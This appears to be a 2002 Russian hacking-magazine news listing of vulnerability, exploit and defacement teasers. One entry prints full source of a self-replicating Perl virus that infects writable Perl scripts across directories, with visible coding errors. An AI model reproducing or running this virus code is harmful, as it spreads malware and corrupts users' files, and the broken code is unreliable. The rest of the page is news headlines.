Раскрытие информации о точке доступа в Windows XP
Обнаруженная уязвимость позволяет раскрыть список значений SSID, назначенных зарегистрированным точкам доступа и пакеты, заш…
Эксплоит WinSSLMiM
WinSSLMiM - эксплоит, реализующий нападение HTTPS "Man in the Middle". Программа содержит FakeCert, утилиту для со…
Патч для IE 5.5 и 6.0
Выпущена очередная заплата к Internet Explorer 5.5 и 6.0, которая содержит все предыдущие исправления к Internet Explorer и …
DoS против Outlook 2002
При работе с полученными почтовыми сообщениями Outlook обрабатывает информацию, содержащуюся в почтовом заголовке, которая с…
Взломанные сайты: 05.12.2002
Взломан:
Южная Корея атакует Белый Дом
В понедельник группа южнокорейских хакеров предприняла попытку взломать компьютерную сеть Белого дома, стараясь тем сам…
Вирус на Perl №2
В следующем исходнике дано решение данной проблемы: #!/usr/bin/perl # Perl - Get'em'all Virus open(File,$0); @Virus=<File>; @Virus=@Virus[0...46]; close(File); &InfectFile; if ($^0 =~ "MacOS") { chdir('::'); &InfectFile; } else { if (($^O =~ "dos") or ($^O =~ "MSWin32")) { $OldDir = `cd`; chdir('..'); &InfectFile; chdir('C:\'); &SearchUpperDirectorys; chdir($OldDir);} else { $OldDir = `pwd`; chdir("/"); &SearchUpperDirectorys; chdir($OldDir);}} sub InfectFile { foreach $FileName (<*>) { if ((-r $FileName) && (-w $FileName) && (-f $FileName)) { open(File, "$FileName"); @Temp=<File>; close(File); if ((@Temp[1] =~ "Virus") or (@Temp[2] =~ "Virus")) { if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl")) { open(File, ">$FileName"); print File @Virus; print File @Temp; close (File); }}}}} sub SearchUpperDirectorys { foreach $Directory (<*>) { if ((-r $Directory) && (-w &Directory ) && (-d $Directory) { chdir ($Directory); &InfectFile; chdir ('..') }}} OK, если мы в системе MacOS, то заражаем лишь низшую директорию
Недостаток в FUS механизме в Windows XP
Microsoft Windows XP содержит особенность, которая называется Fast User Switching (FUS). Эта особенность позволяет нескольки…
Ракрытие информации в SuidPerl
Suidperl - perl интерпретатор для suid perl сценариев, часть пакета perl. Уязвимость, обнаруженная в SuidPerl, позволяет ата…
Обход ограничений зоны безопасности в Internet Explorer 6.0
Сценарий может обратиться к данным других доменов, в том числе и к "Local computer zone", когда назначается стиль текст…
Переполнение буфера в Netscape 4
Реализация Java в Netscape 4 содержит переполнение буфера в методе sun.awt.windows. WDefaultFontCharset. canConvert(). Уязви…
Переполнение буфера в Windows клиенте SSH
Переполнение буфера обнаружено в Windows клиенте SSH. Уязвимость происходит из-за ошибки в URL обработчике в Secure Shell кл…
Переполнение буфера в Samba
Переполнение буфера обнаружено в подпрограмме изменения пароля в Samba. Из-за недостаточной проверки границ пользовательског…
Вирус на Perl
Единственная цель этой статьи - получение дополнительных знаний, которые помогут начинающим программистам (таким как я :-)) в освоении языка Perl. Код, использованный здесь, является достаточно простым для понимания теми, кто уже имеет базисные знания Perl
Слет хакеров в Швеции
DreamHack - это крупнейший всемирный слет (lan-party) хакеров и геймеров. Он проводится в Швеции дважды в год, начиная с 199…
Взломанные сайты: 04.12.02
Взломан:
Изменение SQL запроса в PortailPHP
PortailPHP - популярная система управления содержанием. Уязвимость обнаружена в модуле mod_search, включенном в PortailPHP. …
Межсайтовый скриптинг в YaBB 1 Gold
YaBB - популярная доска объявлений для UNIX и Windows систем. Удаленный атакующий может сконструировать специальную ссылку, …
Несколько переполнений буфера в pServ
pServ - небольшой Web сервер. Пакет pServ содержит несколько переполнений буфера, которые позволяют удаленному атакующему вы…
Переполнение буфера в Sybase xp_freedll
Еще одна функция Sybase годится для выполнения произвольных команд на сервере - xp_freedll. Sybase Adaptive Server хранит эт…
Переполнение буфера в Sybase DBCC CHECKVERIFY
В функции DBCC CHECKVERIFY можно переполнить буфер и выполнить произвольные команды с привилегиями сервера. В качестве парам…
Directory Transversal в pWins
В pWins (web-сервер на Perl) существует возможность обхода корневой директории.
Червь своими руками
Сегодня я опишу тебе принцип работы сетевого вируса. Тема, как ты понял, весьма актуальная, поскольку 70% лично моего ящика всегда бывает забита вирусами самого разного пошиба - от мелких, но злобных VBS-червей до полуторамеговых произведений младших школьников :) Они-то ведь не знают про существование WinAPI :)
Беспрецедентное нападение на UltraDNS
Неизвестные злоумышленники предприняли распределенную DoS-атаку на крупного провайдера службы управления доменными именами. …
Возможность DNS имитации в BIND
CAIS/RNP (Brazilian Research Network CSIRT) и Vagner Sacramento от DIMAp/UFRN (Отдел Информатики и Прикладной математики Фед…
DoS против ScreenOS
Уязвимость, обнаруженная в механизме обработки управляющий сеансов H.323, позволяет исчерпать все доступные входы в таблице …
Межсайтовый скриптинг в cFreeProxy
cFreeProxy (a.k.a. " acFP") - HTTP/1.x кэширующий прокси сервер для Microsoft Windows. Обнаруженная уязвимость позволяет ата…
Удаленное переполнение буфера в Sun Microsystems Solaris
fs.auto - реализация "X Window Font Service" для Sun Solaris. XFS протокол предназначен для совместного использования ш…
Межсайтовый скриптинг в XOOPS Quiz Module
Xoops - свободно доступное программное обеспечение для создания Web порталов, написанное в PHP для Unix+MySQL. Уязвимость в …
Взломанные сайты: 27.11.2002
Взломан:
Межсайтовый скриптинг в PostNuke
PostNuke - система управления содержанием, основанная на PHP-Nuke. Уязвимость межсайтового скриптинга в программе позволяет …
Межсайтовый скриптинг в VBulletin
vBulletin - популярная доска объявлений. vBulletin не фильтрует HTML тэги в некоторых URI параметрах. В результате, удаленны…
Хищение файла настроек в Netscape Communicator
Netscape Communicator - популярный пакет, включающий в себя web браузер, почтовый клиент, клиент новостей и адресную книгу. …
Backdoor в Alcatel OS
AOS - Alcatel Operating System, используемая на Alcatel OmniSwitch 7700 и 7800 моделях. В некоторые релизы AOS встроен "back…
Уязвимость в Sun/Netscape Java Virtual Machine Bytecode Verifier
Уязвимость, обнаруженная в Sun и Netscape Java Virtual Machine, связанна с верификатором байт-кода, компонентой Java компиля…
Нарушение таблицы состояния в NetBSD FTP
Ftpd сервер в NetBSD не в состоянии правильно обработать STAT команду, когда имя файла содержит "\n[0-9]" символы. Уязвимост…
Три переполнения в RealPlayer
В RealOne/RealPlayer обнаружено три возможности удаленного переполнения буфера, два из которых связанны с переполнением дина…
Взломанные сайты: 25.11.2002
Взломан:
Эксплоит для Linux Rsync
Уязвимость в утилите rsync позволяет удаленному атакующему выполнить произвольный код на сервере.
Несколько уявимостей в Cisco PIX Firewall
Cisco PIX Firewall - многофункциональная система межсетевой защиты. В продукте обнаружено 2 уязвимости:
Бумажный спецвыпуск
«ХАКЕР» ДОСТУПЕН ТОЛЬКО В ЭЛЕКТРОННОЙ ВЕРСИИ
Оформи подписку — получи:
- доступ к платным материалам сайта
- доступ ко всем номерам PDF
4500 р.
на год
на год
950 р.
на месяц
на месяц
Материалы для подписчиков
Вопросы по материалам и подписке: support@glc.ru
Отдел рекламы и спецпроектов: yakovleva.a@glc.ru
Контент 18+
Сайт защищен Qrator —
самой забойной защитой от DDoS в мире
Отдел рекламы и спецпроектов: yakovleva.a@glc.ru
Контент 18+
Сайт защищен Qrator —самой забойной защитой от DDoS в мире